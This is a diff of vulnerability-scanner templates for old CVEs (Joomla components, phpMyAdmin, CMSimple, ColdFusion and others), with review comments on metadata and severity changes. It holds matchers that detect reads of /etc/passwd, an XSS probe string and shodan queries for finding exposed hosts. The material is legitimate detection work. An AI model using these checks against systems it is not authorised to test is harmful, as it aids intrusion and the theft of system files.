CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference:
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42792
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42793
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2008-2650
cwe-id: CWE-22
tags: cve,cve2008,lfi,cmsimple
epss-score: 0.06344
cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cmsimple
product: cmsimple
tags: cve,cve2008,lfi,cmsimple
http:
- raw:
@ -29,7 +34,6 @@ http:
matchers-condition: and
matchers:
- type: regex
part: body
regex:


@ -3,21 +3,25 @@ id: CVE-2008-4668
info:
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
author: daffainfo
severity: high
severity: critical
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
- http://securityreason.com/securityalert/4464
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45490
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P
cvss-score: 9
cve-id: CVE-2008-4668
cwe-id: CWE-22
tags: cve,cve2008,joomla,lfi,edb
epss-score: 0.01018
cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: com_imagebrowser
tags: cve,cve2008,joomla,lfi,edb
http:
- method: GET
@ -26,7 +30,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -3,21 +3,24 @@ id: CVE-2008-4764
info:
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference:
- https://www.exploit-db.com/exploits/5435
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-4764
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
epss-score: 0.00779
cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:*
metadata:
max-request: 1
vendor: extplorer
product: com_extplorer
tags: edb,cve,cve2008,joomla,lfi
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -7,18 +7,22 @@ info:
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
- http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
- http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html
- http://securityreason.com/securityalert/4737
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2008-5587
cwe-id: CWE-22
epss-score: 0.02331
cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"phpPgAdmin"
vendor: phppgadmin
product: phppgadmin
tags: cve,cve2008,lfi,phppgadmin,edb
http:
@ -28,7 +32,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"


@ -3,21 +3,24 @@ id: CVE-2008-6080
info:
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/6809
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46039
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6080
cwe-id: CWE-22
tags: edb,cve,cve2008,joomla,lfi
epss-score: 0.00548
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: codecall
product: com_ionfiles
tags: edb,cve,cve2008,joomla,lfi
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -3,21 +3,24 @@ id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://nvd.nist.gov/vuln/detail/CVE-2008-6172
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46081
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2008-6172
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
epss-score: 0.00367
cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: weberr
product: rwcards
tags: cve2008,joomla,lfi,edb,cve
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -3,21 +3,24 @@ id: CVE-2008-6222
info:
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6980
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46356
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6222
cwe-id: CWE-22
tags: cve2008,joomla,lfi,edb,cve
epss-score: 0.00684
cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomlashowroom
product: pro_desk_support_center
tags: cve2008,joomla,lfi,edb,cve
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -12,14 +12,18 @@ info:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-6465
cwe-id: CWE-80
cwe-id: CWE-79
epss-score: 0.00421
cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
shodan-query: title:"Parallels H-Sphere
vendor: parallels
product: h-sphere
tags: cve,cve2008,xss,parallels,h-sphere
http:
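Review bot: The `shodan-query` value in this metadata block is missing its closing double quote (`title:"Parallels H-Sphere`), so the search string is malformed for anyone who copies it to build an asset inventory. The line should read `shodan-query: title:"Parallels H-Sphere"`. The commit already edits this block to add `vendor` and `product`, so the fix fits in the same change.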

View File

@ -3,21 +3,25 @@ id: CVE-2008-6668
info:
name: nweb2fax <=0.2.7 - Local File Inclusion
author: geeknik
severity: high
severity: medium
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43172
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2008-6668
cwe-id: CWE-22
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
epss-score: 0.00359
cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: dirk_bartley
product: nweb2fax
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
http:
- method: GET
@ -27,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
part: body
regex:


@ -3,21 +3,26 @@ id: CVE-2008-6982
info:
name: Devalcms 1.4a - Cross-Site Scripting
author: arafatansari
severity: high
severity: medium
description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
reference:
- https://www.exploit-db.com/exploits/6369
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
- https://exchange.xforce.ibmcloud.com/vulnerabilities/44940
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2008-6982
cwe-id: CWE-79
epss-score: 0.0038
cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:*
metadata:
max-request: 1
verified: true
vendor: devalcms
product: devalcms
tags: cve,cve2008,devalcms,xss,cms,edb
http:


@ -10,15 +10,18 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2008-7269
- https://www.exploit-db.com/exploits/6823
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-score: 5.8
cve-id: CVE-2008-7269
cwe-id: CWE-20
epss-score: 0.03645
cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"SiteEngine"
verified: "true"
vendor: boka
product: siteengine
tags: cve,cve2008,redirect,siteengine
http:
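Review bot: `verified: "true"` in this metadata block is a quoted string, while the other templates in this commit write the boolean `verified: true`. A consumer that type-checks the field or filters on a boolean would treat this template differently from the rest. Since the block is being rewritten anyway, change the line to `verified: true`.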


@ -11,14 +11,18 @@ info:
- https://www.exploit-db.com/exploits/32766
- https://www.kb.cert.org/vuls/id/202753
- https://exchange.xforce.ibmcloud.com/vulnerabilities/48336
- http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html
classification:
cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P
cvss-score: 5.8
cve-id: CVE-2009-0347
cwe-id: CWE-59
epss-score: 0.08272
cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: autonomy
product: ultraseek
tags: cve,cve2009,redirect,autonomy
http:
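Review bot: The `cpe` value in `classification` carries `_nil_` in the version field, which reads like a placeholder taken over from the upstream CPE record rather than a real version. Tooling that correlates findings with an asset inventory by CPE is unlikely to match it. A wildcard version, `cpe: cpe:2.3:a:autonomy:ultraseek:*:*:*:*:*:*:*:*`, would be consistent with the other templates in this commit. The line appears to be an addition, but the +/- markers are lost on this page.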


@ -10,14 +10,19 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
- http://www.vupen.com/english/advisories/2009/0385
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2009-0545
cwe-id: CWE-20
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
epss-score: 0.9719
cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:*
metadata:
max-request: 1
vendor: zeroshell
product: zeroshell
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
http:
- method: GET


@ -3,21 +3,26 @@ id: CVE-2009-0932
info:
name: Horde/Horde Groupware - Local File Inclusion
author: pikpikcu
severity: high
severity: medium
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
- http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5
- http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N
cvss-score: 6.4
cve-id: CVE-2009-0932
cwe-id: CWE-22
tags: cve,cve2009,horde,lfi,traversal,edb
epss-score: 0.04048
cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: debian
product: horde
tags: cve,cve2009,horde,lfi,traversal,edb
http:
- method: GET
@ -26,7 +31,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
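Review bot: `severity: medium` appears to follow from replacing the CVSS 3.0 vector (8.6) with a CVSS 2.0 vector (6.4), so the rating now sits on a different scale from templates that keep v3 scores, while the description still says attackers can include and execute arbitrary local files. A scan filtered with `-severity high` will no longer select this template. The same shift shows in CVE-2009-1496, CVE-2009-2100 and CVE-2009-3053 (high to medium) and in CVE-2009-1151, which goes from critical to high although it is tagged `kev` and carries `epss-score: 0.79256`. I would keep the earlier severity for these, or at least add `# severity follows the CVSS v2 base score` above `cvss-metrics` so the downgrade is visibly deliberate. The old/new assignment is inferred from the paired lines, since the +/- markers are lost on this page.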


@ -3,7 +3,7 @@ id: CVE-2009-1151
info:
name: PhpMyAdmin Scripts - Remote Code Execution
author: princechaddha
severity: critical
severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
@ -12,13 +12,17 @@ info:
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-1151
cwe-id: CWE-77
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
cwe-id: CWE-94
epss-score: 0.79256
cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: phpmyadmin
product: phpmyadmin
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
http:
- raw:
@ -33,10 +37,10 @@ http:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200


@ -3,21 +3,24 @@ id: CVE-2009-1496
info:
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2009-1496
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00533
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -7,18 +7,22 @@ info:
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference:
- https://www.exploit-db.com/exploits/32954
- https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
- http://www.vupen.com/english/advisories/2009/1173
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
- https://nvd.nist.gov/vuln/detail/CVE-2009-1558
- https://exchange.xforce.ibmcloud.com/vulnerabilities/50231
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N
cvss-score: 7.8
cve-id: CVE-2009-1558
cwe-id: CWE-22
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
epss-score: 0.00901
cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: wvc54gca
tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
http:
- method: GET


@ -6,20 +6,23 @@ info:
severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
- https://nvd.nist.gov/vuln/detail/CVE-2009-1872
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2009-1872
cwe-id: CWE-79
cvss-score: 4.3
epss-score: 0.3657
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
verified: true
vendor: adobe
product: coldfusion
tags: cve,cve2009,adobe,xss,coldfusion,tenable
http:
@ -30,9 +33,9 @@ http:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header


@ -7,17 +7,20 @@ info:
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
reference:
- https://www.exploit-db.com/exploits/8898
- http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
- http://www.vupen.com/english/advisories/2009/1530
- https://nvd.nist.gov/vuln/detail/CVE-2009-2015
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-2015
cwe-id: CWE-22
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00813
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -3,21 +3,23 @@ id: CVE-2009-2100
info:
name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
- https://nvd.nist.gov/vuln/detail/CVE-2009-2100
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
cvss-score: 5
cve-id: CVE-2009-2100
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
epss-score: 0.00528
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: cve,cve2009,joomla,lfi,edb
http:
- method: GET
@ -26,7 +28,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -3,21 +3,25 @@ id: CVE-2009-3053
info:
name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: high
severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
- https://nvd.nist.gov/vuln/detail/CVE-2009-3053
- http://www.exploit-db.com/exploits/9564
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2009-3053
cwe-id: CWE-22
tags: cve,cve2009,joomla,lfi,edb
epss-score: 0.00367
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: cve,cve2009,joomla,lfi,edb
http:
- method: GET
@ -26,7 +30,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"


@ -8,16 +8,19 @@ info:
reference:
- https://www.exploit-db.com/exploits/9706
- https://nvd.nist.gov/vuln/detail/CVE-2009-3318
- https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
- http://www.exploit-db.com/exploits/9706
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2009-3318
cwe-id: CWE-22
cvss-score: 7.5
tags: joomla,lfi,edb,cve,cve2009
epss-score: 0.00706
cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: joomla
product: joomla
tags: joomla,lfi,edb,cve,cve2009
http:
- method: GET
@ -26,7 +29,6 @@ http:
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
